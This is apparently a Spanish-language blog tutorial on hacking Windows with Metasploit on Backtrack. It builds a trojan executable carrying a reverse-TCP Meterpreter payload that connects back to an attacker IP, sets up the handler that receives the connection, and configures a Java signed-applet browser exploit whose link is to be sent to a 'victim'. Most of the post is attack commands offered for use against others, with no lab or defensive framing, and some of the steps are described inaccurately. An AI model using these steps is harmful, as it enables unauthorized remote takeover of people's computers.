Hackeando Windows usando Backtrack

Recopilo este antiguo post utilizado para penetrar sistemas operativos Windows en sus versiones XP, 7 y hasta 8 usando la poderosa herramienta Metasploit. Para ello usaremos 2 métodos los cuales serán explicados en detalle para su puesta a prueba 



1.- Creando Troyanos

Primero debemos definir ¿Que es un Troyano?

Segun Wiki : En informática,se denomina troyano o caballo de Troya (traducción literal del inglés Trojan horse) a un software malicioso que se presenta al usuario como un programa aparentemente legítimo e inofensivo pero al ejecutarlo le brinda a un atacante acceso remoto al equipo infectado. En resumen, lo que haremos aquí es elaborar un archivo que al ser ejecutado en un equipo remoto podremos tomar control del mismo desde nuestro equipo atacante

Segundo definiremos Que es un exploit?

Es un conjunto de comandos definidos que usualmente trabajan con metasploit que cumplen el objetivo de explotar una vulnerabilidad determinada.

Ahora si empecemos crackeros!

Abrimos la consola y escribimos el popular comando


msfconsole



Ahora introducimos el siguiente comando :


msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=445 x > /root/exploit.exe 

Analizando el comando podemos deducir lo siguiente :
LHOST : Ip local desde donde ejecutaremos como "servidor" el troyano
LPORT : Puerto usado, en este caso 445
root/exploit.exe: directorio y ejecutable creado

Seguimos?
Bien ahora activamos el handler usando el comando

use exploit/multi/handler

Ahora, que es un Handler?

En Metasploit, un handler es lo que utilizamos para conectar con un destino. Dependiendo del payload, el handler quedará a la escucha esperando una conexión por parte del payload (reverse payload) o iniciará una conexión contra un host en un puerto especificado (caso de un bind payload).

set payload windows/meterpreter/reverse_tcp 

Con este comando lo que hacemos es configurar el payload para que este listo para el ataque

set lhost  (tu ip, ejemplo 192.168.1.67)
Con este comando configuramos el lhost que como ya mencionamos es el host local y tambien podemos configurar el puerto

set lport 445


Finalmente, ingresamos el comando

exploit
Se generara el exploit (Ojo:localmente) en el directorio que especificamos anteriormente

2.- Aprovechando una vulnerabilidad remotamente

Podemos aprovechar también el descuido de un usuario común al cual en nuestro caso llamaremos "victima" y aprovecharemos una vulnerabilidad propia de una aplicación. Bueno empecemos!

Introducimos el ya famoso comando
msfconsole
 ahora usamos el exploit que atacara esa vulnerabilidad remota

 use exploit/multi/browser/java_signed_applet

Ya tenemos el exploit activo y listo para configurarlo

set srvhost
srvhost + ip : configuramos nuestra ip en este caso la ip desde donde es enciara el exploit
uripath / : Se usa para establecer una ruta fija para una peticion GET o bien aleatoria si esta NO se define.

Entonces introducimos esos 2 paramentros

Ahora activamos el payload ya conocido anteriormente :

set payload windows/meterpreter/reverse_tcp
Muy bien ahora configuraremos los parametros del payload

 set lhost + ip (puede ser la ip publica, puedes averiguarla visitando sistios como cualesmiip.com)
 ser lport 445 : El puerto que usaremos


ahora activamos el exploit

exploit

Ahora podremos mandar a nuestra victima el link publico el cual hara que nuestro exploit se active


Saludos crackeros!!


Powered by Blogger.